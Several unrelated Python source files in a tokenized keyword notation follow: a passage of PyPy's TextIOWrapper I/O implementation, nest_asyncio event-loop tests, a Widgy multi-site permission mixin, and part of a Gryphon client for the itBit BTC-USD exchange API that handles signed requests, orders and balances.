<block_start>next_input=dec_buffer+space.bytes_w(w_input)<line_sep>self.snapshot=PositionSnapshot(dec_flags next_input)<block_end><return><not>eof<block_end><def_stmt>_ensure_data self space<block_start><while_stmt><not>self.decoded.has_data()<block_start><try_stmt><block_start><if_stmt><not>self._read_chunk(space)<block_start>self.decoded.reset()<line_sep>self.snapshot=<none><line_sep><return><false><block_end><block_end><except_stmt>OperationError<as>e<block_start><if_stmt>trap_eintr(space e)<block_start><continue><block_end><raise><block_end><block_end><return><true><block_end><def_stmt>next_w self space<block_start>self._check_attached(space)<line_sep>self.telling=<false><try_stmt><block_start><return>W_TextIOBase.next_w(self space)<block_end><except_stmt>OperationError<as>e<block_start><if_stmt>e.match(space space.w_StopIteration)<block_start>self.telling=self.seekable<block_end><raise><block_end><block_end><def_stmt>read_w self space w_size=<none><block_start>self._check_attached(space)<line_sep>self._check_closed(space)<if_stmt><not>self.w_decoder<block_start><raise>oefmt(space.w_IOError "not readable")<block_end>size=convert_size(space w_size)<line_sep>self._writeflush(space)<if_stmt>size<l>0# Read everything <block_start>w_bytes=space.call_method(self.w_buffer "read")<line_sep>w_decoded=space.call_method(self.w_decoder "decode" w_bytes space.w_True)<line_sep>check_decoded(space w_decoded)<line_sep>w_result=space.newunicode(self.decoded.get_chars(-1))<line_sep>w_final=space.add(w_result w_decoded)<line_sep>self.snapshot=<none><line_sep><return>w_final<block_end>remaining=size<line_sep>builder=UnicodeBuilder(size)<line_sep># Keep reading chunks until we have n characters to return <while_stmt>remaining<g>0<block_start><if_stmt><not>self._ensure_data(space)<block_start><break><block_end>data=self.decoded.get_chars(remaining)<line_sep>builder.append(data)<line_sep>remaining<augsub>len(data)<block_end><return>space.newunicode(builder.build())<block_end><def_stmt>_scan_line_ending self limit<block_start><if_stmt>self.readuniversal<block_start><return>self.decoded.find_newline_universal(limit)<block_end><else_stmt><block_start><if_stmt>self.readtranslate# Newlines are already translated, only search for \n <block_start>newline=u'\n'<block_end><else_stmt># Non-universal mode. <block_start>newline=self.readnl<block_end><if_stmt>newline<eq>u'\r\n'<block_start><return>self.decoded.find_crlf(limit)<block_end><else_stmt><block_start><return>self.decoded.find_char(newline[0] limit)<block_end><block_end><block_end><def_stmt>readline_w self space w_limit=<none><block_start>self._check_attached(space)<line_sep>self._check_closed(space)<line_sep>self._writeflush(space)<line_sep>limit=convert_size(space w_limit)<line_sep>remnant=<none><line_sep>builder=UnicodeBuilder()<while_stmt><true># First, get some data if necessary <block_start>has_data=self._ensure_data(space)<if_stmt><not>has_data# end of file <block_start><if_stmt>remnant<block_start>builder.append(remnant)<block_end><break><block_end><if_stmt>remnant<block_start><assert_stmt><not>self.readtranslate<and>self.readnl<eq>u'\r\n'<assert_stmt>self.decoded.pos<eq>0<if_stmt>remnant<eq>u'\r'<and>self.decoded.text[0]<eq>u'\n'<block_start>builder.append(u'\r\n')<line_sep>self.decoded.pos=1<line_sep>remnant=<none><line_sep><break><block_end><else_stmt><block_start>builder.append(remnant)<line_sep>remnant=<none><line_sep><continue><block_end><block_end><if_stmt>limit<ge>0<block_start>remaining=limit-builder.getlength()<assert_stmt>remaining<ge>0<block_end><else_stmt><block_start>remaining=-1<block_end>start=self.decoded.pos<assert_stmt>start<ge>0<line_sep>found=self._scan_line_ending(remaining)<line_sep>end_scan=self.decoded.pos<if_stmt>end_scan<g>start<block_start>s=self.decoded.text[start:end_scan]<line_sep>builder.append(s)<block_end><if_stmt>found<or>(limit<ge>0<and>builder.getlength()<ge>limit)<block_start><break><block_end># There may be some remaining chars we'll have to prepend to the # next chunk of data <if_stmt><not>self.decoded.exhausted()<block_start>remnant=self.decoded.get_chars(-1)<block_end># We have consumed the buffer self.decoded.reset()<block_end>result=builder.build()<line_sep><return>space.newunicode(result)<block_end># _____________________________________________________________ # write methods <def_stmt>write_w self space w_text<block_start>self._check_attached(space)<line_sep>self._check_closed(space)<if_stmt><not>self.w_encoder<block_start><raise>oefmt(space.w_IOError "not writable")<block_end><if_stmt><not>space.isinstance_w(w_text space.w_unicode)<block_start><raise>oefmt(space.w_TypeError "unicode argument expected, got '%T'" w_text)<block_end>text=space.unicode_w(w_text)<line_sep>textlen=len(text)<line_sep>haslf=<false><if_stmt>(self.writetranslate<and>self.writenl)<or>self.line_buffering<block_start><if_stmt>text.find(u'\n')<ge>0<block_start>haslf=<true><block_end><block_end><if_stmt>haslf<and>self.writetranslate<and>self.writenl<block_start>w_text=space.call_method(w_text "replace" space.newunicode(u'\n') space.newunicode(self.writenl))<line_sep>text=space.unicode_w(w_text)<block_end>needflush=<false><if_stmt>self.line_buffering<and>(haslf<or>text.find(u'\r')<ge>0)<block_start>needflush=<true><block_end># XXX What if we were just reading? <if_stmt>self.encodefunc<block_start>w_bytes=self.encodefunc(space w_text self.errors)<line_sep>self.encoding_start_of_stream=<false><block_end><else_stmt><block_start>w_bytes=space.call_method(self.w_encoder "encode" w_text)<block_end>b=space.bytes_w(w_bytes)<if_stmt><not>self.pending_bytes<block_start>self.pending_bytes=[]<line_sep>self.pending_bytes_count=0<block_end>self.pending_bytes.append(b)<line_sep>self.pending_bytes_count<augadd>len(b)<if_stmt>self.pending_bytes_count<g>self.chunk_size<or>needflush<block_start>self._writeflush(space)<block_end><if_stmt>needflush<block_start>space.call_method(self.w_buffer "flush")<block_end>self.snapshot=<none><if_stmt>self.w_decoder<block_start>space.call_method(self.w_decoder "reset")<block_end><return>space.newint(textlen)<block_end><def_stmt>_writeflush self space<block_start><if_stmt><not>self.pending_bytes<block_start><return><block_end>pending_bytes=''.join(self.pending_bytes)<line_sep>self.pending_bytes=<none><line_sep>self.pending_bytes_count=0<while_stmt><true><block_start><try_stmt><block_start>space.call_method(self.w_buffer "write" space.newbytes(pending_bytes))<block_end><except_stmt>OperationError<as>e<block_start><if_stmt>trap_eintr(space e)<block_start><continue><block_end><raise><block_end><else_stmt><block_start><break><block_end><block_end><block_end><def_stmt>detach_w self space<block_start>self._check_attached(space)<line_sep>space.call_method(self "flush")<line_sep>w_buffer=self.w_buffer<line_sep>self.w_buffer=<none><line_sep>self.state=STATE_DETACHED<line_sep><return>w_buffer<block_end># _____________________________________________________________ # seek/tell <def_stmt>_decoder_setstate self space cookie# When seeking to the start of the stream, we call decoder.reset() # rather than decoder.getstate(). # This is for a few decoders such as utf-16 for which the state value # at start is not (b"", 0) but e.g. (b"", 2) (meaning, in the case of # utf-16, that we are expecting a BOM). <block_start><if_stmt>cookie.start_pos<eq>0<and>cookie.dec_flags<eq>0<block_start>space.call_method(self.w_decoder "reset")<block_end><else_stmt><block_start>space.call_method(self.w_decoder "setstate" space.newtuple([space.newbytes("") space.newint(cookie.dec_flags)]))<block_end><block_end><def_stmt>_encoder_setstate self space cookie<block_start><if_stmt>cookie.start_pos<eq>0<and>cookie.dec_flags<eq>0<block_start>space.call_method(self.w_encoder "reset")<line_sep>self.encoding_start_of_stream=<true><block_end><else_stmt><block_start>space.call_method(self.w_encoder "setstate" space.newint(0))<line_sep>self.encoding_start_of_stream=<false><block_end><block_end>@unwrap_spec(whence=int)<def_stmt>seek_w self space w_pos whence=0<block_start>self._check_attached(space)<if_stmt><not>self.seekable<block_start><raise>oefmt(space.w_IOError "underlying stream is not seekable")<block_end><if_stmt>whence<eq>1# seek relative to current position <block_start><if_stmt><not>space.eq_w(w_pos space.newint(0))<block_start><raise>oefmt(space.w_IOError "can't do nonzero cur-relative seeks")<block_end># Seeking to the current position should attempt to sync the # underlying buffer with the current position. w_pos=space.call_method(self "tell")<block_end><elif_stmt>whence<eq>2# seek relative to end of file <block_start><if_stmt><not>space.eq_w(w_pos space.newint(0))<block_start><raise>oefmt(space.w_IOError "can't do nonzero end-relative seeks")<block_end>space.call_method(self "flush")<line_sep>self.decoded.reset()<line_sep>self.snapshot=<none><if_stmt>self.w_decoder<block_start>space.call_method(self.w_decoder "reset")<block_end><return>space.call_method(self.w_buffer "seek" w_pos space.newint(whence))<block_end><elif_stmt>whence<ne>0<block_start><raise>oefmt(space.w_ValueError "invalid whence (%d, should be 0, 1 or 2)" whence)<block_end><if_stmt>space.is_true(space.lt(w_pos space.newint(0)))<block_start><raise>oefmt(space.w_ValueError "negative seek position %R" w_pos)<block_end>space.call_method(self "flush")<line_sep># The strategy of seek() is to go back to the safe start point and # replay the effect of read(chars_to_skip) from there. cookie=PositionCookie(space.bigint_w(w_pos))<line_sep># Seek back to the safe start point space.call_method(self.w_buffer "seek" space.newint(cookie.start_pos))<line_sep>self.decoded.reset()<line_sep>self.snapshot=<none><line_sep># Restore the decoder to its state from the safe start point. <if_stmt>self.w_decoder<block_start>self._decoder_setstate(space cookie)<block_end><if_stmt>cookie.chars_to_skip# Just like _read_chunk, feed the decoder and save a snapshot. <block_start>w_chunk=space.call_method(self.w_buffer "read" space.newint(cookie.bytes_to_feed))<if_stmt><not>space.isinstance_w(w_chunk space.w_bytes)<block_start>msg="underlying read() should have returned "<concat>"a bytes object, not '%T'"<line_sep><raise>oefmt(space.w_TypeError msg w_chunk)<block_end>self.snapshot=PositionSnapshot(cookie.dec_flags space.bytes_w(w_chunk))<line_sep>w_decoded=space.call_method(self.w_decoder "decode" w_chunk space.newbool(bool(cookie.need_eof)))<line_sep>w_decoded=check_decoded(space w_decoded)<line_sep># Skip chars_to_skip of the decoded characters <if_stmt>space.len_w(w_decoded)<l>cookie.chars_to_skip<block_start><raise>oefmt(space.w_IOError "can't restore logical file position")<block_end>self.decoded.set(space w_decoded)<line_sep>self.decoded.pos=cookie.chars_to_skip<block_end><else_stmt><block_start>self.snapshot=PositionSnapshot(cookie.dec_flags "")<block_end># Finally, reset the encoder (merely useful for proper BOM handling) <if_stmt>self.w_encoder<block_start>self._encoder_setstate(space cookie)<block_end><return>w_pos<block_end><def_stmt>tell_w self space<block_start>self._check_closed(space)<if_stmt><not>self.seekable<block_start><raise>oefmt(space.w_IOError "underlying stream is not seekable")<block_end><if_stmt><not>self.telling<block_start><raise>oefmt(space.w_IOError "telling position disabled by next() call")<block_end>self._writeflush(space)<line_sep>space.call_method(self "flush")<line_sep>w_pos=space.call_method(self.w_buffer "tell")<if_stmt>self.w_decoder<is><none><or>self.snapshot<is><none><block_start><assert_stmt><not>self.decoded.text<line_sep><return>w_pos<block_end>cookie=PositionCookie(space.bigint_w(w_pos))<line_sep># Skip backward to the snapshot point (see _read_chunk) cookie.dec_flags=self.snapshot.flags<line_sep>input=self.snapshot.input<line_sep>cookie.start_pos<augsub>len(input)<line_sep># How many decoded characters have been used up since the snapshot? <if_stmt><not>self.decoded.pos# We haven't moved from the snapshot point. <block_start><return>space.newlong_from_rbigint(cookie.pack())<block_end>chars_to_skip=self.decoded.pos<line_sep># Starting from the snapshot position, we will walk the decoder # forward until it gives us enough decoded characters. w_saved_state=space.call_method(self.w_decoder "getstate")<try_stmt># Note our initial start point <block_start>self._decoder_setstate(space cookie)<line_sep># Feed the decoder one byte at a time. As we go, note the nearest # "safe start point" before the current location (a point where # the decoder has nothing buffered, so seek() can safely start # from there and advance to this location). chars_decoded=0<line_sep>i=0<while_stmt>i<l>len(input)<block_start>w_decoded=space.call_method(self.w_decoder "decode" space.newbytes(input[i]))<line_sep>check_decoded(space w_decoded)<line_sep>chars_decoded<augadd>space.len_w(w_decoded)<line_sep>cookie.bytes_to_feed<augadd>1<line_sep>w_state=space.call_method(self.w_decoder "getstate")<line_sep>w_dec_buffer,w_flags=space.unpackiterable(w_state 2)<line_sep>dec_buffer_len=space.len_w(w_dec_buffer)<if_stmt>dec_buffer_len<eq>0<and>chars_decoded<le>chars_to_skip# Decoder buffer is empty, so this is a safe start point. <block_start>cookie.start_pos<augadd>cookie.bytes_to_feed<line_sep>chars_to_skip<augsub>chars_decoded<assert_stmt>chars_to_skip<ge>0<line_sep>cookie.dec_flags=space.int_w(w_flags)<line_sep>cookie.bytes_to_feed=0<line_sep>chars_decoded=0<block_end><if_stmt>chars_decoded<ge>chars_to_skip<block_start><break><block_end>i<augadd>1<block_end><else_stmt># We didn't get enough decoded data; signal EOF to get more. <block_start>w_decoded=space.call_method(self.w_decoder "decode" space.newbytes("") space.newint(1))<line_sep># final=1 check_decoded(space w_decoded)<line_sep>chars_decoded<augadd>space.len_w(w_decoded)<line_sep>cookie.need_eof=1<if_stmt>chars_decoded<l>chars_to_skip<block_start><raise>oefmt(space.w_IOError "can't reconstruct logical file position")<block_end><block_end><block_end><finally_stmt><block_start>space.call_method(self.w_decoder "setstate" w_saved_state)<block_end># The returned cookie corresponds to the last safe start point. cookie.chars_to_skip=chars_to_skip<line_sep><return>space.newlong_from_rbigint(cookie.pack())<block_end><def_stmt>chunk_size_get_w self space<block_start>self._check_attached(space)<line_sep><return>space.newint(self.chunk_size)<block_end><def_stmt>chunk_size_set_w self space w_size<block_start>self._check_attached(space)<line_sep>size=space.int_w(w_size)<if_stmt>size<le>0<block_start><raise>oefmt(space.w_ValueError "a strictly positive integer is required")<block_end>self.chunk_size=size<block_end><block_end>W_TextIOWrapper.typedef=TypeDef('_io.TextIOWrapper' W_TextIOBase.typedef __new__=generic_new_descr(W_TextIOWrapper) __init__=interp2app(W_TextIOWrapper.descr_init) __repr__=interp2app(W_TextIOWrapper.descr_repr) next=interp2app(W_TextIOWrapper.next_w) read=interp2app(W_TextIOWrapper.read_w) readline=interp2app(W_TextIOWrapper.readline_w) write=interp2app(W_TextIOWrapper.write_w) seek=interp2app(W_TextIOWrapper.seek_w) tell=interp2app(W_TextIOWrapper.tell_w) detach=interp2app(W_TextIOWrapper.detach_w) flush=interp2app(W_TextIOWrapper.flush_w) truncate=interp2app(W_TextIOWrapper.truncate_w) close=interp2app(W_TextIOWrapper.close_w) line_buffering=interp_attrproperty("line_buffering" W_TextIOWrapper wrapfn="newint") readable=interp2app(W_TextIOWrapper.readable_w) writable=interp2app(W_TextIOWrapper.writable_w) seekable=interp2app(W_TextIOWrapper.seekable_w) isatty=interp2app(W_TextIOWrapper.isatty_w) fileno=interp2app(W_TextIOWrapper.fileno_w) name=GetSetProperty(W_TextIOWrapper.name_get_w) buffer=interp_attrproperty_w("w_buffer" cls=W_TextIOWrapper) closed=GetSetProperty(W_TextIOWrapper.closed_get_w) errors=interp_attrproperty_w("w_errors" cls=W_TextIOWrapper) newlines=GetSetProperty(W_TextIOWrapper.newlines_get_w) _CHUNK_SIZE=GetSetProperty(W_TextIOWrapper.chunk_size_get_w W_TextIOWrapper.chunk_size_set_w) )<line_sep>
<import_stmt>asyncio<import_stmt>sys<import_stmt>unittest<import_stmt>nest_asyncio<def_stmt>exception_handler loop context<block_start>print('Exception:' context)<block_end><class_stmt>NestTest(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.loop=asyncio.new_event_loop()<line_sep>nest_asyncio.apply(self.loop)<line_sep>asyncio.set_event_loop(self.loop)<line_sep>self.loop.set_debug(<true>)<line_sep>self.loop.set_exception_handler(exception_handler)<block_end><def_stmt>tearDown self<block_start>self.assertIsNone(asyncio._get_running_loop())<line_sep>self.loop.close()<del_stmt>self.loop<block_end><async_keyword><def_stmt>coro self<block_start><await>asyncio.sleep(0.01)<line_sep><return>42<block_end><def_stmt>test_nesting self<block_start><async_keyword><def_stmt>f1 <block_start>result=self.loop.run_until_complete(self.coro())<line_sep>self.assertEqual(result <await>self.coro())<line_sep><return>result<block_end><async_keyword><def_stmt>f2 <block_start>result=self.loop.run_until_complete(f1())<line_sep>self.assertEqual(result <await>f1())<line_sep><return>result<block_end>result=self.loop.run_until_complete(f2())<line_sep>self.assertEqual(result 42)<block_end><def_stmt>test_ensure_future_with_run_until_complete self<block_start><async_keyword><def_stmt>f <block_start>task=asyncio.ensure_future(self.coro())<line_sep><return>self.loop.run_until_complete(task)<block_end>result=self.loop.run_until_complete(f())<line_sep>self.assertEqual(result 42)<block_end><def_stmt>test_ensure_future_with_run_until_complete_with_wait self<block_start><async_keyword><def_stmt>f <block_start>task=asyncio.ensure_future(self.coro())<line_sep>done,pending=self.loop.run_until_complete(asyncio.wait([task] return_when=asyncio.ALL_COMPLETED))<line_sep>task=done.pop()<line_sep><return>task.result()<block_end>result=self.loop.run_until_complete(f())<line_sep>self.assertEqual(result 42)<block_end><def_stmt>test_timeout self<block_start><async_keyword><def_stmt>f1 <block_start><await>asyncio.sleep(0.1)<block_end><async_keyword><def_stmt>f2 <block_start>asyncio.run(asyncio.wait_for(f1() 0.01))<block_end><with_stmt>self.assertRaises(asyncio.TimeoutError)<block_start>self.loop.run_until_complete(f2())<block_end><block_end><def_stmt>test_two_run_until_completes_in_one_outer_loop self<block_start><async_keyword><def_stmt>f1 <block_start>self.loop.run_until_complete(asyncio.sleep(0.02))<line_sep><return>4<block_end><async_keyword><def_stmt>f2 <block_start>self.loop.run_until_complete(asyncio.sleep(0.01))<line_sep><return>2<block_end>result=self.loop.run_until_complete(asyncio.gather(f1() f2()))<line_sep>self.assertEqual(result [4 2])<block_end>@unittest.skipIf(sys.version_info<l>(3 7 0) 'No contextvars module')<def_stmt>test_contextvars self<block_start><import_from_stmt>contextvars ContextVar<line_sep>var=ContextVar('var')<line_sep>var.set(0)<async_keyword><def_stmt>set_val <block_start>var.set(42)<block_end><async_keyword><def_stmt>coro <block_start><await>set_val()<line_sep><await>asyncio.sleep(0.01)<line_sep><return>var.get()<block_end>result=self.loop.run_until_complete(coro())<line_sep>self.assertEqual(result 42)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>mezzanine.utils.sites current_site_id has_site_permission<import_from_stmt>widgy.models Content<class_stmt>MultiSitePermissionMixin(object)<block_start><def_stmt>_can_edit_content self request obj<block_start><if_stmt>isinstance(obj Content)<block_start>owners=obj.get_root().node.versiontracker_set.get().owners<line_sep>any_owner_in_current_site=any(current_site_id()<eq>o.site_id<for>o owners)<line_sep><return>has_site_permission(request.user)<and>any_owner_in_current_site<block_end><else_stmt><block_start><return><true><block_end><block_end><def_stmt>has_add_permission self request parent created_obj_cls<block_start><if_stmt><not>self._can_edit_content(request parent)<block_start><return><false><block_end><return>super(MultiSitePermissionMixin self).has_add_permission(request parent created_obj_cls)<block_end><def_stmt>has_change_permission self request obj_or_class<block_start><if_stmt><not>self._can_edit_content(request obj_or_class)<block_start><return><false><block_end><return>super(MultiSitePermissionMixin self).has_change_permission(request obj_or_class)<block_end><def_stmt>has_delete_permission self request obj_or_class<block_start><if_stmt><not>all(self._can_edit_content(request o)<for>o obj_or_class.depth_first_order())<block_start><return><false><block_end><return>super(MultiSitePermissionMixin self).has_delete_permission(request obj_or_class)<block_end><block_end>
""" Exchange documentation: https://api.itbit.com/docs """<line_sep># -*- coding: utf-8 -*- <import_stmt>base64<import_from_stmt>collections OrderedDict defaultdict<import_stmt>hashlib<import_stmt>hmac<import_stmt>json<import_stmt>time<import_stmt>urllib<import_stmt>cdecimal<import_from_stmt>cdecimal Decimal<import_from_stmt>gryphon.lib.exchange exceptions<import_from_stmt>gryphon.lib.exchange order_types<import_from_stmt>gryphon.lib.exchange.exchange_api_wrapper ExchangeAPIWrapper<import_from_stmt>gryphon.lib.logger get_logger<import_from_stmt>gryphon.lib.models.exchange Balance<import_from_stmt>gryphon.lib.money Money<import_from_stmt>gryphon.lib.time_parsing parse<line_sep>logger=get_logger(__name__)<class_stmt>ItbitBTCUSDExchange(ExchangeAPIWrapper)<block_start><def_stmt>__init__ self session=<none> configuration=<none><block_start>super(ItbitBTCUSDExchange self).__init__(session)<line_sep>self.name=u'ITBIT_BTC_USD'<line_sep>self.friendly_name=u'Itbit BTC-USD'<line_sep>self.base_url='https://api.itbit.com/v1'<line_sep>self.currency='USD'<line_sep>self.bid_string='buy'<line_sep>self.ask_string='sell'<line_sep>self.nonce=1<line_sep># Configurables with defaults. self.market_order_fee=Decimal('0.002')<line_sep>self.limit_order_fee=Decimal('0')<line_sep>self.fee=self.market_order_fee<line_sep>self.fiat_balance_tolerance=Money('0.0001' 'USD')<line_sep>self.volume_balance_tolerance=Money('0.00000001' 'BTC')<line_sep>self.max_tick_speed=1<line_sep>self.min_order_size=Money('0' 'BTC')<line_sep>self.use_cached_orderbook=<false><if_stmt>configuration<block_start>self.configure(configuration)<block_end><block_end>@property<def_stmt>wallet_id self<block_start><try_stmt><block_start>self._wallet_id<block_end><except_stmt>AttributeError<block_start>self._wallet_id=self._load_env('ITBIT_BTC_USD_WALLET_ID')<block_end><return>self._wallet_id<block_end><def_stmt>req self req_method url **kwargs# Our auth_request method expects the params in the url. <block_start><assert_stmt>'?'<not><in>url<if_stmt>'params'<in>kwargs<block_start><if_stmt>kwargs['params']# Check that it's not empty. <block_start>url<augadd>'?'+urllib.urlencode(kwargs['params'])<block_end><del_stmt>kwargs['params']<block_end>req=super(ItbitBTCUSDExchange self).req(req_method url **kwargs)<line_sep><return>req<block_end><def_stmt>resp self req<block_start>response=super(ItbitBTCUSDExchange self).resp(req)<if_stmt>'error'<in>response<and>response['error']<block_start><raise>exceptions.ExchangeAPIErrorException(self response['error'])<block_end><if_stmt>'code'<in>response<block_start>errors_string=str(response['description'])<line_sep>error_code=int(response['code'])<if_stmt>error_code<eq>81001<block_start><raise>exceptions.InsufficientFundsError()<block_end><elif_stmt>error_code<eq>10002<block_start><raise>exceptions.NonceError()<block_end><elif_stmt>error_code<eq>81002<block_start><raise>exceptions.CancelOrderNotFoundError()<block_end><else_stmt><block_start><raise>exceptions.ExchangeAPIErrorException(self 'Code %s: %s'%(error_code errors_string ))<block_end><block_end><return>response<block_end><def_stmt>all_trades self page=1<block_start>req=self.all_trades_req(page)<line_sep><return>self.all_trades_resp(req)<block_end><def_stmt>all_trades_req self page=1<block_start>params={}<if_stmt>page<block_start>params['page']=page<block_end><return>self.req('get' '/wallets/%s/trades'%self.wallet_id params=params )<block_end><def_stmt>all_trades_resp self req<block_start>response=self.resp(req)<line_sep><return>response['tradingHistory']<block_end><def_stmt>trades_for_orders self order_ids<block_start>req=self.trades_for_orders_req()<line_sep><return>self.trades_for_orders_resp(req order_ids)<block_end><def_stmt>trades_for_orders_req self<block_start><return>self.all_trades_req()<block_end><def_stmt>trades_for_orders_resp self req order_ids<block_start>order_ids=[str(o)<for>o order_ids]<line_sep>trades=self.all_trades_resp(req)<line_sep>matching_trades=defaultdict(list)<for_stmt>trade trades<block_start>oid=str(trade['orderId'])<if_stmt>oid<in>order_ids<block_start>matching_trades[oid].append(trade)<block_end><block_end><return>matching_trades<block_end><def_stmt>all_orders self status=<none> page=1<block_start>req=self.all_orders_req(status page)<line_sep><return>self.all_orders_resp(req)<block_end><def_stmt>all_orders_req self status=<none> page=1<block_start>params={}<if_stmt>status<block_start>params['status']=status<block_end><if_stmt>page<block_start>params['page']=page<block_end><return>self.req('get' '/wallets/%s/orders'%self.wallet_id params=params )<block_end><def_stmt>all_orders_resp self req<block_start>raw_orders=self.resp(req)<line_sep>orders=[]<for_stmt>raw_order raw_orders<block_start>mode=self._order_mode_to_const(raw_order['side'])<line_sep>volume=Money(raw_order['amount'] 'BTC')<line_sep>volume_filled=Money(raw_order['amountFilled'] 'BTC')<line_sep>volume_remaining=volume-volume_filled<line_sep>order={'mode':mode 'id':str(raw_order['id']) 'price':Money(raw_order['price'] 'USD') 'volume':volume 'volume_remaining':volume_remaining 'status':raw_order['status']}<line_sep>orders.append(order)<block_end><return>orders<block_end># Common Exchange Methods <def_stmt>auth_request self req_method url request_args<block_start>""" This modifies request_args. """<try_stmt><block_start>self.api_key<line_sep>self.secret<block_end><except_stmt>AttributeError<block_start>self.api_key=self._load_env('ITBIT_BTC_USD_API_KEY')<line_sep>self.secret=self._load_env('ITBIT_BTC_USD_API_SECRET').encode('utf-8')<block_end>timestamp=int(round(time.time()<times>1000))<line_sep>nonce=self.nonce<line_sep>body=''<if_stmt>'data'<in>request_args<block_start>body=json.dumps(request_args['data'])<block_end>request_args['data']=body<line_sep>message=self._auth_create_message(req_method url body nonce timestamp)<line_sep>sig=self._auth_sign_message(message nonce url self.secret)<if_stmt>'headers'<not><in>request_args<block_start>request_args['headers']={}<block_end>headers=request_args['headers']<line_sep>headers['Authorization']=self.api_key+':'+sig<line_sep>headers['X-Auth-Timestamp']=str(timestamp)<line_sep>headers['X-Auth-Nonce']=str(nonce)<line_sep>headers['Content-Type']='application/json'<block_end><def_stmt>_auth_create_message self verb url body nonce timestamp<block_start><return>json.dumps([verb.upper() url body str(nonce) str(timestamp)] separators=(',' ':') )<block_end><def_stmt>_auth_sign_message self message nonce url api_secret<block_start>sha256_hash=hashlib.sha256()<line_sep>nonced_message=str(nonce)+message<line_sep>sha256_hash.update(nonced_message)<line_sep>hash_digest=sha256_hash.digest()<line_sep>msg_to_hmac=url.encode('utf8')+hash_digest<line_sep>hmac_digest=hmac.new(api_secret msg_to_hmac hashlib.sha512).digest()<line_sep>sig=base64.b64encode(hmac_digest)<line_sep><return>sig<block_end><def_stmt>get_balance_req self<block_start><try_stmt><block_start>self.user_id<block_end><except_stmt>AttributeError<block_start>self.user_id=self._load_env('ITBIT_BTC_USD_USER_ID')<block_end><return>self.req('get' '/wallets/%s'%self.wallet_id)<block_end><def_stmt>get_balance_resp self req<block_start>response=self.resp(req)<line_sep>raw_balances=response['balances']<line_sep>btc_available=<none><line_sep>usd_available=<none><for_stmt>raw_balance raw_balances<block_start><if_stmt>raw_balance['currency']<eq>'XBT'<block_start>btc_available=Money(raw_balance['availableBalance'] 'BTC')<block_end><elif_stmt>raw_balance['currency']<eq>'USD'<block_start>usd_available=Money(raw_balance['availableBalance'] 'USD')<block_end><block_end><if_stmt>btc_available<is><none><or>usd_available<is><none><block_start><raise>exceptions.ExchangeAPIErrorException(self 'missing expected balances' )<block_end>balance=Balance()<line_sep>balance['BTC']=btc_available<line_sep>balance['USD']=usd_available<line_sep><return>balance<block_end><def_stmt>get_ticker_req self verify=<true><block_start><return>self.req('get' '/markets/XBTUSD/ticker' no_auth=<true> verify=verify )<block_end><def_stmt>get_ticker_resp self req<block_start>response=self.resp(req)<line_sep><return>{'high':Money(response['high24h'] 'USD') 'low':Money(response['low24h'] 'USD') 'last':Money(response['lastPrice'] 'USD') 'volume':Money(response['volume24h'] 'BTC')}<block_end><def_stmt>_get_orderbook_from_api_req self verify=<true><block_start><return>self.req('get' '/markets/XBTUSD/order_book' no_auth=<true> verify=verify )<block_end><def_stmt>place_order_req self mode volume price=<none> order_type=order_types.LIMIT_ORDER<block_start>side=self._order_mode_from_const(mode)<if_stmt>price.currency<ne>'USD'<block_start><raise>ValueError('price must be in USD')<block_end><if_stmt>volume.currency<ne>'BTC'<block_start><raise>ValueError('volume must be in BTC')<block_end># Truncate the volume instead of rounding it because it's better# to trade too # little than too much. volume=volume.round_to_decimal_places(8 rounding=cdecimal.ROUND_DOWN)<line_sep>volume_str='%.8f'%volume.amount<line_sep>price_str='%.2f'%price.amount<line_sep>payload={'type':'limit' 'currency':'XBT' 'side':side 'amount':volume_str 'price':price_str 'instrument':'XBTUSD'}<line_sep><return>self.req('post' '/wallets/%s/orders/'%self.wallet_id data=payload )<block_end><def_stmt>place_order_resp self req<block_start>response=self.resp(req)<try_stmt><block_start>order_id=str(response['id'])<line_sep><return>{'success':<true> 'order_id':order_id}<block_end><except_stmt>KeyError<block_start><raise>exceptions.ExchangeAPIErrorException(self 'response does not contain an order id' )<block_end><block_end><def_stmt>get_open_orders_req self<block_start><return>self.all_orders_req(status='open')<block_end><def_stmt>get_open_orders_resp self req<block_start>open_orders=self.all_orders_resp(req)<for_stmt>o open_orders<block_start><del_stmt>o['status']<block_end><return>open_orders<block_end><def_stmt>get_order_details self order_id<block_start>req=self.get_order_details_req()<line_sep><return>self.get_order_details_resp(req order_id)<block_end><def_stmt>get_order_details_req self<block_start><return>self.get_multi_order_details_req()<block_end><def_stmt>get_order_details_resp self req order_id<block_start><return>self.get_multi_order_details_resp(req [order_id])[order_id]<block_end><def_stmt>get_multi_order_details self order_ids<block_start>req=self.get_multi_order_details_req()<line_sep><return>self.get_multi_order_details_resp(req order_ids)<block_end><def_stmt>get_multi_order_details_req self<block_start><return>self.trades_for_orders_req()<block_end><def_stmt>get_multi_order_details_resp self req order_ids# This is modeled after Bitstamp, where we get the order details from the # trades endpoint directly. The caveat is that order_details will only work # for the most recent 50 trades. Since we are always accounting trades right # after they happen, this should be ok (and also affects Bitstamp). <block_start>order_ids=[str(o)<for>o order_ids]<line_sep>multi_trades=self.trades_for_orders_resp(req order_ids)<line_sep>data={}<for_stmt>order_id order_ids<block_start>total_usd=Money('0' 'USD')<line_sep>total_btc=Money('0' 'BTC')<line_sep>our_trades=[]<line_sep>our_type=<none><if_stmt>order_id<in>multi_trades<block_start>trades=multi_trades[order_id]<for_stmt>t trades<block_start><assert_stmt>(t['currency1']<eq>'XBT')<line_sep>btc_amount=Money(t['currency1Amount'] 'BTC')<assert_stmt>(t['currency2']<eq>'USD')<line_sep>usd_amount=Money(t['currency2Amount'] 'USD')<line_sep># This might also come back as XBT, but since ItBit has 0-fee # trading right now, I can't tell. <assert_stmt>(t['commissionCurrency']<eq>'USD')<line_sep>fee=Money(t['commissionPaid'] 'USD')<line_sep>total_usd<augadd>usd_amount<line_sep>total_btc<augadd>btc_amount<line_sep>our_type=self._order_mode_to_const(t['direction'])<line_sep>our_trades.append({'time':parse(t['timestamp']).epoch 'trade_id':<none> 'fee':fee 'btc':btc_amount 'fiat':usd_amount })<block_end><block_end>time_created=<none><if_stmt>our_trades<block_start>time_created=min([t['time']<for>t our_trades])<block_end>data[order_id]={'time_created':time_created 'type':our_type 'btc_total':total_btc 'fiat_total':total_usd 'trades':our_trades}<block_end><return>data<block_end><def_stmt>cancel_order_req self order_id<block_start><return>self.req('delete' '/wallets/%s/orders/%s'%(self.wallet_id order_id) )<block_end><def_stmt>cancel_order_resp self req# In the success 